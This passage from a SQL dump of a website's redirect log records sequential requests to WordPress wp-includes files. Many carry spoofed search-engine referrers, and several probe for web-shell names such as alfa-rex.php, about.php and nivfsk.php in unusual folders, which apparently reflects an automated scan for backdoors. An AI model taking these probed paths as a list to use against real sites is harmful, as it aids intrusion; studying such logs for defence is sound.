00:00:00',301),(52775,'http://3s-technologies.com.tr/en/wp-includes/author-template.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:27','0000-00-00 00:00:00',301),(52776,'http://3s-technologies.com.tr/en/wp-includes/block-bindings.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:28','0000-00-00 00:00:00',301),(52777,'http://3s-technologies.com.tr/en/wp-includes/block-bindings/pattern-overrides.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:29','0000-00-00 00:00:00',301),(52778,'http://3s-technologies.com.tr/en/wp-includes/block-bindings/post-meta.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:30','0000-00-00 00:00:00',301),(52779,'http://3s-technologies.com.tr/en/wp-includes/block-editor.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:15:31','0000-00-00 00:00:00',301),(52780,'http://3s-technologies.com.tr/en/wp-includes/block-patterns.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:32','0000-00-00 00:00:00',301),(52781,'http://3s-technologies.com.tr/en/wp-includes/images/crystal/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:32','0000-00-00 00:00:00',301),(52782,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/alfa-rex.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:15:33','0000-00-00 00:00:00',301),(52783,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/query-grid-posts.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:34','0000-00-00 00:00:00',301),(52784,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/query-large-title-posts.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:35','0000-00-00 00:00:00',301),(52785,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/query-medium-posts.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:36','0000-00-00 00:00:00',301),(52786,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/query-offset-posts.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:37','0000-00-00 00:00:00',301),(52787,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/query-small-posts.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:38','0000-00-00 00:00:00',301),(52788,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/query-standard-posts.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:38','0000-00-00 00:00:00',301),(52789,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/social-links-shared-background-color.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:39','0000-00-00 00:00:00',301),(52790,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:40','0000-00-00 00:00:00',301),(52791,'http://3s-technologies.com.tr/en/wp-includes/block-supports/about.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:15:41','0000-00-00 00:00:00',301),(52792,'http://3s-technologies.com.tr/en/wp-includes/block-supports/alfa-rex.php',NULL,'https://www.bing.com/','',5,0,'2025-12-20 05:15:42','0000-00-00 00:00:00',301),(52793,'http://3s-technologies.com.tr/en/wp-includes/block-supports/align.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:43','0000-00-00 00:00:00',301),(52794,'http://3s-technologies.com.tr/en/wp-includes/block-supports/background.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:44','0000-00-00 00:00:00',301),(52795,'http://3s-technologies.com.tr/en/wp-includes/block-supports/block-style-variations.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:15:45','0000-00-00 00:00:00',301),(52796,'http://3s-technologies.com.tr/en/wp-includes/block-supports/border.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:15:45','0000-00-00 00:00:00',301),(52797,'http://3s-technologies.com.tr/en/wp-includes/block-supports/colors.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:15:46','0000-00-00 00:00:00',301),(52798,'http://3s-technologies.com.tr/en/wp-includes/block-supports/custom-classname.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:47','0000-00-00 00:00:00',301),(52799,'http://3s-technologies.com.tr/en/wp-includes/block-supports/dimensions.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:15:48','0000-00-00 00:00:00',301),(52800,'http://3s-technologies.com.tr/en/wp-includes/block-supports/duotone.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:49','0000-00-00 00:00:00',301),(52801,'http://3s-technologies.com.tr/en/wp-includes/block-supports/elements.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:50','0000-00-00 00:00:00',301),(52802,'http://3s-technologies.com.tr/en/wp-includes/block-supports/generated-classname.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:15:50','0000-00-00 00:00:00',301),(52803,'http://3s-technologies.com.tr/en/wp-includes/block-supports/layout.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:51','0000-00-00 00:00:00',301),(52804,'http://3s-technologies.com.tr/en/wp-includes/block-supports/position.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:52','0000-00-00 00:00:00',301),(52805,'http://3s-technologies.com.tr/en/wp-includes/block-supports/settings.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:53','0000-00-00 00:00:00',301),(52806,'http://3s-technologies.com.tr/en/wp-includes/block-supports/shadow.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:54','0000-00-00 00:00:00',301),(52807,'http://3s-technologies.com.tr/en/wp-includes/block-supports/spacing.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:15:55','0000-00-00 00:00:00',301),(52808,'http://3s-technologies.com.tr/en/wp-includes/block-supports/typography.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:56','0000-00-00 00:00:00',301),(52809,'http://3s-technologies.com.tr/en/wp-includes/block-supports/utils.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:56','0000-00-00 00:00:00',301),(52810,'http://3s-technologies.com.tr/en/wp-includes/block-supports/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:15:57','0000-00-00 00:00:00',301),(52811,'http://3s-technologies.com.tr/en/wp-includes/block-template-utils.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:15:58','0000-00-00 00:00:00',301),(52812,'http://3s-technologies.com.tr/en/wp-includes/block-template.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:59','0000-00-00 00:00:00',301),(52813,'http://3s-technologies.com.tr/en/wp-includes/blocks.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:00','0000-00-00 00:00:00',301),(52814,'http://3s-technologies.com.tr/en/wp-includes/blocks/group/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:01','0000-00-00 00:00:00',301),(52815,'http://3s-technologies.com.tr/en/wp-includes/bookmark-template.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:02','0000-00-00 00:00:00',301),(52816,'http://3s-technologies.com.tr/en/wp-includes/bookmark.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:02','0000-00-00 00:00:00',301),(52817,'http://3s-technologies.com.tr/en/wp-includes/cache-compat.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:03','0000-00-00 00:00:00',301),(52818,'http://3s-technologies.com.tr/en/wp-includes/cache.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:16:04','0000-00-00 00:00:00',301),(52819,'http://3s-technologies.com.tr/en/wp-includes/canonical.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:05','0000-00-00 00:00:00',301),(52820,'http://3s-technologies.com.tr/en/wp-includes/capabilities.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:06','0000-00-00 00:00:00',301),(52821,'http://3s-technologies.com.tr/en/wp-includes/category-template.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:07','0000-00-00 00:00:00',301),(52822,'http://3s-technologies.com.tr/en/wp-includes/category.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:08','0000-00-00 00:00:00',301),(52823,'http://3s-technologies.com.tr/en/wp-includes/certificates/about.php',NULL,'https://www.google.com/','',5,0,'2025-12-20 05:16:09','0000-00-00 00:00:00',301),(52824,'http://3s-technologies.com.tr/en/wp-includes/certificates/alfa-rex.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:16:10','0000-00-00 00:00:00',301),(52825,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:16:10','0000-00-00 00:00:00',301),(52826,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp/nivfsk.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:11','0000-00-00 00:00:00',301),(52827,'http://3s-technologies.com.tr/en/wp-includes/class-ixr.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:12','0000-00-00 00:00:00',301),(52828,'http://3s-technologies.com.tr/en/wp-includes/class-avif-info.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:13','0000-00-00 00:00:00',301),(52829,'http://3s-technologies.com.tr/en/wp-includes/class-feed.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:14','0000-00-00 00:00:00',301),(52830,'http://3s-technologies.com.tr/en/wp-includes/class-http.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:15','0000-00-00 00:00:00',301),(52831,'http://3s-technologies.com.tr/en/wp-includes/class-json.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:16','0000-00-00 00:00:00',301),(52832,'http://3s-technologies.com.tr/en/wp-includes/class-oembed.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:16','0000-00-00 00:00:00',301),(52833,'http://3s-technologies.com.tr/en/wp-includes/class-phpass.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:16:17','0000-00-00 00:00:00',301),(52834,'http://3s-technologies.com.tr/en/wp-includes/class-phpmailer.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:18','0000-00-00 00:00:00',301),(52835,'http://3s-technologies.com.tr/en/wp-includes/class-pop3.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:19','0000-00-00 00:00:00',301),(52836,'http://3s-technologies.com.tr/en/wp-includes/class-requests.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:20','0000-00-00 00:00:00',301),(52837,'http://3s-technologies.com.tr/en/wp-includes/class-simplepie.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:21','0000-00-00 00:00:00',301),(52838,'http://3s-technologies.com.tr/en/wp-includes/class-smtp.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:16:21','0000-00-00 00:00:00',301),(52839,'http://3s-technologies.com.tr/en/wp-includes/class-snoopy.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:22','0000-00-00 00:00:00',301),(52840,'http://3s-technologies.com.tr/en/wp-includes/class-walker-category-dropdown.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:23','0000-00-00 00:00:00',301),(52841,'http://3s-technologies.com.tr/en/wp-includes/class-walker-category.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:16:24','0000-00-00 00:00:00',301),(52842,'http://3s-technologies.com.tr/en/wp-includes/class-walker-comment.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:25','0000-00-00 00:00:00',301),(52843,'http://3s-technologies.com.tr/en/wp-includes/class-walker-nav-menu.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:16:26','0000-00-00 00:00:00',301),(52844,'http://3s-technologies.com.tr/en/wp-includes/class-walker-page-dropdown.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:27','0000-00-00 00:00:00',301),(52845,'http://3s-technologies.com.tr/en/wp-includes/class-walker-page.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:28','0000-00-00 00:00:00',301),(52846,'http://3s-technologies.com.tr/en/wp-includes/class-wp-admin-bar.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:29','0000-00-00 00:00:00',301),(52847,'http://3s-technologies.com.tr/en/wp-includes/class-wp-ajax-response.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:30','0000-00-00 00:00:00',301),(52848,'http://3s-technologies.com.tr/en/wp-includes/class-wp-application-passwords.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:30','0000-00-00 00:00:00',301),(52849,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-bindings-registry.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:31','0000-00-00 00:00:00',301),(52850,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-bindings-source.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:32','0000-00-00 00:00:00',301),(52851,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-editor-context.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:33','0000-00-00 00:00:00',301),(52852,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-metadata-registry.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:35','0000-00-00 00:00:00',301),(52853,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-parser-block.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:36','0000-00-00 00:00:00',301),(52854,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-parser-frame.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:36','0000-00-00 00:00:00',301),(52855,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-parser.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:16:37','0000-00-00 00:00:00',301),(52856,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-pattern-categories-registry.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:38','0000-00-00 00:00:00',301),(52857,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-patterns-registry.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:39','0000-00-00 00:00:00',301),(52858,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-styles-registry.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:40','0000-00-00 00:00:00',301),(52859,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-supports.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:41','0000-00-00 00:00:00',301),(52860,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-template.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:42','0000-00-00 00:00:00',301),(52861,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-templates-registry.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:43','0000-00-00 00:00:00',301),(52862,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-type-registry.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:44','0000-00-00 00:00:00',301),(52863,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-type.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:16:45','0000-00-00 00:00:00',301),(52864,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:46','0000-00-00 00:00:00',301),(52865,'http://3s-technologies.com.tr/en/wp-includes/class-wp-classic-to-block-menu-converter.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:46','0000-00-00 00:00:00',301),(52866,'http://3s-technologies.com.tr/en/wp-includes/class-wp-comment-query.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:47','0000-00-00 00:00:00',301),(52867,'http://3s-technologies.com.tr/en/wp-includes/class-wp-comment.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:16:48','0000-00-00 00:00:00',301),(52868,'http://3s-technologies.com.tr/en/wp-includes/class-wp-customize-control.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:16:49','0000-00-00 00:00:00',301),(52869,'http://3s-technologies.com.tr/en/wp-includes/class-wp-customize-manager.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:50','0000-00-00 00:00:00',301),(52870,'http://3s-technologies.com.tr/en/wp-includes/class-wp-customize-nav-menus.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:51','0000-00-00 00:00:00',301),(52871,'http://3s-technologies.com.tr/en/wp-includes/class-wp-customize-panel.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:52','0000-00-00 00:00:00',301),(52872,'http://3s-technologies.com.tr/en/wp-includes/class-wp-customize-section.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:16:53','0000-00-00 00:00:00',301),(52873,'http://3s-technologies.com.tr/en/wp-includes/class-wp-customize-setting.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:16:53','0000-00-00 00:00:00',301),(52874,'http://3s-technologies.com.tr/en/wp-includes/class-wp-customize-widgets.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:16:54','0000-00-00 00:00:00',301),(52875,'http://3s-technologies.com.tr/en/wp-includes/class-wp-date-query.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:16:56','0000-00-00 00:00:00',301),(52876,'http://3s-technologies.com.tr/en/wp-includes/class-wp-dependencies.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:16:56','0000-00-00 00:00:00',301),(52877,'http://3s-technologies.com.tr/en/wp-includes/class-wp-dependency.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:57','0000-00-00 00:00:00',301),(52878,'http://3s-technologies.com.tr/en/wp-includes/class-wp-duotone.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:16:58','0000-00-00 00:00:00',301),(52879,'http://3s-technologies.com.tr/en/wp-includes/class-wp-editor.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:16:59','0000-00-00 00:00:00',301),(52880,'http://3s-technologies.com.tr/en/wp-includes/class-wp-embed.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:17:00','0000-00-00 00:00:00',301),(52881,'http://3s-technologies.com.tr/en/wp-includes/class-wp-error.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:01','0000-00-00 00:00:00',301),(52882,'http://3s-technologies.com.tr/en/wp-includes/class-wp-exception.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:17:02','0000-00-00 00:00:00',301),(52883,'http://3s-technologies.com.tr/en/wp-includes/class-wp-fatal-error-handler.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:17:03','0000-00-00 00:00:00',301),(52884,'http://3s-technologies.com.tr/en/wp-includes/class-wp-feed-cache-transient.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:03','0000-00-00 00:00:00',301),(52885,'http://3s-technologies.com.tr/en/wp-includes/class-wp-feed-cache.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:04','0000-00-00 00:00:00',301),(52886,'http://3s-technologies.com.tr/en/wp-includes/class-wp-hook.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:05','0000-00-00 00:00:00',301),(52887,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-cookie.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:06','0000-00-00 00:00:00',301),(52888,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-curl.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:07','0000-00-00 00:00:00',301),(52889,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-encoding.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:08','0000-00-00 00:00:00',301),(52890,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-ixr-client.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:09','0000-00-00 00:00:00',301),(52891,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-proxy.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:10','0000-00-00 00:00:00',301),(52892,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-requests-hooks.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:11','0000-00-00 00:00:00',301),(52893,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-requests-response.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:12','0000-00-00 00:00:00',301),(52894,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-response.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:12','0000-00-00 00:00:00',301),(52895,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http-streams.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:13','0000-00-00 00:00:00',301),(52896,'http://3s-technologies.com.tr/en/wp-includes/class-wp-http.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:14','0000-00-00 00:00:00',301),(52897,'http://3s-technologies.com.tr/en/wp-includes/class-wp-image-editor-gd.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:15','0000-00-00 00:00:00',301),(52898,'http://3s-technologies.com.tr/en/wp-includes/class-wp-image-editor-imagick.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:16','0000-00-00 00:00:00',301),(52899,'http://3s-technologies.com.tr/en/wp-includes/class-wp-image-editor.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:17','0000-00-00 00:00:00',301),(52900,'http://3s-technologies.com.tr/en/wp-includes/class-wp-list-util.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:18','0000-00-00 00:00:00',301),(52901,'http://3s-technologies.com.tr/en/wp-includes/class-wp-locale-switcher.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:19','0000-00-00 00:00:00',301),(52902,'http://3s-technologies.com.tr/en/wp-includes/class-wp-locale.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:19','0000-00-00 00:00:00',301),(52903,'http://3s-technologies.com.tr/en/wp-includes/class-wp-matchesmapregex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:20','0000-00-00 00:00:00',301),(52904,'http://3s-technologies.com.tr/en/wp-includes/class-wp-meta-query.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:21','0000-00-00 00:00:00',301),(52905,'http://3s-technologies.com.tr/en/wp-includes/class-wp-metadata-lazyloader.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:22','0000-00-00 00:00:00',301),(52906,'http://3s-technologies.com.tr/en/wp-includes/class-wp-navigation-fallback.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:23','0000-00-00 00:00:00',301),(52907,'http://3s-technologies.com.tr/en/wp-includes/class-wp-network-query.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:24','0000-00-00 00:00:00',301),(52908,'http://3s-technologies.com.tr/en/wp-includes/class-wp-network.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:25','0000-00-00 00:00:00',301),(52909,'http://3s-technologies.com.tr/en/wp-includes/class-wp-object-cache.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:26','0000-00-00 00:00:00',301),(52910,'http://3s-technologies.com.tr/en/wp-includes/class-wp-oembed-controller.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:27','0000-00-00 00:00:00',301),(52911,'http://3s-technologies.com.tr/en/wp-includes/class-wp-oembed.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:27','0000-00-00 00:00:00',301),(52912,'http://3s-technologies.com.tr/en/wp-includes/class-wp-paused-extensions-storage.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:28','0000-00-00 00:00:00',301),(52913,'http://3s-technologies.com.tr/en/wp-includes/class-wp-plugin-dependencies.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:29','0000-00-00 00:00:00',301),(52914,'http://3s-technologies.com.tr/en/wp-includes/class-wp-post-type.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:31','0000-00-00 00:00:00',301),(52915,'http://3s-technologies.com.tr/en/wp-includes/class-wp-post.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:17:32','0000-00-00 00:00:00',301),(52916,'http://3s-technologies.com.tr/en/wp-includes/class-wp-recovery-mode-cookie-service.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:33','0000-00-00 00:00:00',301),(52917,'http://3s-technologies.com.tr/en/wp-includes/class-wp-recovery-mode-email-service.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:17:34','0000-00-00 00:00:00',301),(52918,'http://3s-technologies.com.tr/en/wp-includes/class-wp-recovery-mode-key-service.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:35','0000-00-00 00:00:00',301),(52919,'http://3s-technologies.com.tr/en/wp-includes/class-wp-recovery-mode-link-service.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:36','0000-00-00 00:00:00',301),(52920,'http://3s-technologies.com.tr/en/wp-includes/class-wp-recovery-mode.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:37','0000-00-00 00:00:00',301),(52921,'http://3s-technologies.com.tr/en/wp-includes/class-wp-rewrite.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:38','0000-00-00 00:00:00',301),(52922,'http://3s-technologies.com.tr/en/wp-includes/class-wp-role.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:39','0000-00-00 00:00:00',301),(52923,'http://3s-technologies.com.tr/en/wp-includes/class-wp-roles.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:40','0000-00-00 00:00:00',301),(52924,'http://3s-technologies.com.tr/en/wp-includes/class-wp-script-modules.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:41','0000-00-00 00:00:00',301),(52925,'http://3s-technologies.com.tr/en/wp-includes/class-wp-scripts.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:42','0000-00-00 00:00:00',301),(52926,'http://3s-technologies.com.tr/en/wp-includes/class-wp-session-tokens.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:43','0000-00-00 00:00:00',301),(52927,'http://3s-technologies.com.tr/en/wp-includes/class-wp-simplepie-file.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:44','0000-00-00 00:00:00',301),(52928,'http://3s-technologies.com.tr/en/wp-includes/class-wp-simplepie-sanitize-kses.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:45','0000-00-00 00:00:00',301),(52929,'http://3s-technologies.com.tr/en/wp-includes/class-wp-site-query.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:45','0000-00-00 00:00:00',301),(52930,'http://3s-technologies.com.tr/en/wp-includes/class-wp-site.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:17:46','0000-00-00 00:00:00',301),(52931,'http://3s-technologies.com.tr/en/wp-includes/class-wp-styles.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:17:47','0000-00-00 00:00:00',301),(52932,'http://3s-technologies.com.tr/en/wp-includes/class-wp-tax-query.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:48','0000-00-00 00:00:00',301),(52933,'http://3s-technologies.com.tr/en/wp-includes/class-wp-taxonomy.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:49','0000-00-00 00:00:00',301),(52934,'http://3s-technologies.com.tr/en/wp-includes/class-wp-term-query.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:50','0000-00-00 00:00:00',301),(52935,'http://3s-technologies.com.tr/en/wp-includes/class-wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:51','0000-00-00 00:00:00',301),(52936,'http://3s-technologies.com.tr/en/wp-includes/class-wp-text-diff-renderer-inline.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:17:52','0000-00-00 00:00:00',301),(52937,'http://3s-technologies.com.tr/en/wp-includes/class-wp-text-diff-renderer-table.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:53','0000-00-00 00:00:00',301),(52938,'http://3s-technologies.com.tr/en/wp-includes/class-wp-textdomain-registry.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:17:53','0000-00-00 00:00:00',301),(52939,'http://3s-technologies.com.tr/en/wp-includes/class-wp-theme-json-data.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:17:54','0000-00-00 00:00:00',301),(52940,'http://3s-technologies.com.tr/en/wp-includes/class-wp-theme-json-resolver.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:17:55','0000-00-00 00:00:00',301),(52941,'http://3s-technologies.com.tr/en/wp-includes/class-wp-theme-json-schema.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:56','0000-00-00 00:00:00',301),(52942,'http://3s-technologies.com.tr/en/wp-includes/class-wp-theme-json.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:17:57','0000-00-00 00:00:00',301),(52943,'http://3s-technologies.com.tr/en/wp-includes/class-wp-theme.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:17:58','0000-00-00 